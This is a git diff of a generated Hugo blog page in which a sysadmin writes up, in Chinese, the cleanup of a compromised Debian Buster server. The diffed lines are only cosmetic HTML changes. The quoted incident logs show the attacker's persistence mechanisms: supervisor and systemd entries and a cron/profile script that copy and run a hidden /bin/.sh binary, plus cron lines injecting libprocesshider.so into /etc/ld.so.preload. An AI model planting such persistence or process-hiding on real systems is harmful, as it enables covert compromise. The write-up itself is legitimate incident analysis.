chchang/hugo_backup
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

update some content

Browse Source
This commit is contained in:
Eric Chang
2021-10-28 14:13:06 +08:00
parent 97eb780aa4
commit 4f99455d8f
242 changed files with 1826 additions and 2616 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
public/post/debian-buster-server-been-hacked/index.html
View File

@@ -13,7 +13,7 @@
"articleSection" : "post",
"name" : "[筆記] Debian Buster 伺服器被入侵了!\/ Debian Buster Server Been Hacked",
"headline" : "[筆記] Debian Buster 伺服器被入侵了!\/ Debian Buster Server Been Hacked",
"description" : "\x3cp\x3e上禮拜某天在開會的時候LINE不斷傳來訊息\x3c\/p\x3e\n\x3cp\x3e不過因為我向來開會都很認真(驕傲,所以都沒看,接著就變成來電了\x3c\/p\x3e\n\x3cp\x3e看來大概有啥事發生\x3c\/p\x3e\n\x3cp\x3e不過畢竟不是正職的工作就先放著吧\x3c\/p\x3e\n\x3cp\x3e後來變成連學長都直接打來告訴我某間公司的伺服器出事了客戶找不到我\x3c\/p\x3e\n\x3cp\x3e叫我趕快連進去看\x3c\/p\x3e\n\x3cp\x3e是說啊我又沒跟人家簽維護趕什麼趕\x26hellip;\x3c\/p\x3e\n\x3cp\x3e總之開完會後就了解一下狀況\x3c\/p\x3e",
"description" : "\u003cp\u003e上禮拜某天在開會的時候LINE不斷傳來訊息\u003c\/p\u003e\n\u003cp\u003e不過因為我向來開會都很認真(驕傲,所以都沒看,接著就變成來電了\u003c\/p\u003e\n\u003cp\u003e看來大概有啥事發生\u003c\/p\u003e\n\u003cp\u003e不過畢竟不是正職的工作就先放著吧\u003c\/p\u003e\n\u003cp\u003e後來變成連學長都直接打來告訴我某間公司的伺服器出事了客戶找不到我\u003c\/p\u003e\n\u003cp\u003e叫我趕快連進去看\u003c\/p\u003e\n\u003cp\u003e是說啊我又沒跟人家簽維護趕什麼趕\u0026hellip;\u003c\/p\u003e\n\u003cp\u003e總之開完會後就了解一下狀況\u003c\/p\u003e",
"inLanguage" : "en",
"author" : "Eric Chang",
"creator" : "Eric Chang",
@@ -21,8 +21,8 @@
"accountablePerson" : "Eric Chang",
"copyrightHolder" : "Eric Chang",
"copyrightYear" : "2020",
"datePublished": "2020-07-10 09:48:24 \x2b0800 CST",
"dateModified" : "2020-07-10 09:48:24 \x2b0800 CST",
"datePublished": "2020-07-10 09:48:24 \u002b0800 CST",
"dateModified" : "2020-07-10 09:48:24 \u002b0800 CST",
"url" : "https:\/\/h.cowbay.org\/post\/debian-buster-server-been-hacked\/",
"wordCount" : "492",
"image" : "https://h.cowbay.orghttps://h.cowbay.org/images/post-default-14.jpg"",
@@ -45,9 +45,9 @@
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">
<link href="https://h.cowbay.org/css/style.css?v=1632901488" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/style.css?v=1634607506" rel="stylesheet" id="theme-stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/custom.css?v=1632901488" rel="stylesheet" type='text/css' media='all'>
<link href="https://h.cowbay.org/css/custom.css?v=1634607506" rel="stylesheet" type='text/css' media='all'>
<link rel="shortcut icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
<link rel="icon" href="https://h.cowbay.org/img/favicon.ico" type="image/x-icon">
@@ -324,7 +324,7 @@ if (!doNotTrack) {
<p>然後開始紀錄邊清</p>
<p>底下是一些記錄下來的log 很亂,因為是邊清邊紀錄的關係</p>
<p>這是在某個特定日期時間被產生出來的檔案</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/etc/allow.bak
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/etc/allow.bak
/etc/deny.bak
/etc/fstab
/etc/sysctl.conf
@@ -360,7 +360,7 @@ if (!doNotTrack) {
/usr/lib/systemd
/usr/lib/mysql/mysql
</code></pre></div><p>/etc/.supervisor/conf.d/sh.conf</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#f92672">[</span>program:.sh<span style="color:#f92672">]</span>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#f92672">[</span>program:.sh<span style="color:#f92672">]</span>
directory<span style="color:#f92672">=</span>/etc/
command<span style="color:#f92672">=</span>/bin/bash -c <span style="color:#e6db74">&#39;cp -f -r -- /etc/spts /bin/.sh 2&gt;/dev/null &amp;&amp; /bin/.sh -c &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /bin/.sh 2&gt;/dev/null&#39;</span>
autostart<span style="color:#f92672">=</span>true
@@ -370,16 +370,16 @@ redirect_stderr<span style="color:#f92672">=</span>true
pidfile<span style="color:#f92672">=</span>/etc/psdewo.pid
stdout_logfile<span style="color:#f92672">=</span>/etc/usercenter_stdout
</code></pre></div><p>php.sh 這個忘了是在crontab 還是/etc/profile.d/底下看到的</p>
<pre><code>#!/bin/bash
<pre tabindex="0"><code>#!/bin/bash
cp -f -r -- /bin/shh /bin/.sh 2&gt;/dev/null
/bin/.sh -c &gt;/dev/null 2&gt;&amp;1
rm -rf -- .sh 2&gt;/dev/null
</code></pre><p>supervisor.sh</p>
<pre><code>#!/bin/bash
<pre tabindex="0"><code>#!/bin/bash
supervisord -c /etc/.supervisor/supervisord.conf &gt;/dev/null 2&gt;&amp;1
supervisorctl reload &gt;/dev/null 2&gt;&amp;1
</code></pre><p>某個 service 檔案</p>
<pre><code>[Unit]
<pre tabindex="0"><code>[Unit]
Description=.sh
Wants=network.target
@@ -394,7 +394,7 @@ KillMode=process
[Install]
WantedBy=multi-user.target
</code></pre><p>syslog 部份內容</p>
<pre><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
<pre tabindex="0"><code>Jul 7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
Jul 7 06:20:01 pve CRON[12499]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul 7 06:21:01 pve CRON[14096]: (root) CMD (/usr/lib/mysql/mysql)
Jul 7 06:21:01 pve CRON[14095]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
@@ -704,7 +704,7 @@ title="pinterest icon"></i>
</div>
<script src="https://h.cowbay.org/js/jquery.min.js"></script>
<script src="https://h.cowbay.org/js/jquerymigrate.js"></script>
<script src="https://h.cowbay.org/js/production.min.js?v=1632901488"></script>
<script src="https://h.cowbay.org/js/production.min.js?v=1634607506"></script>
</body>
</html>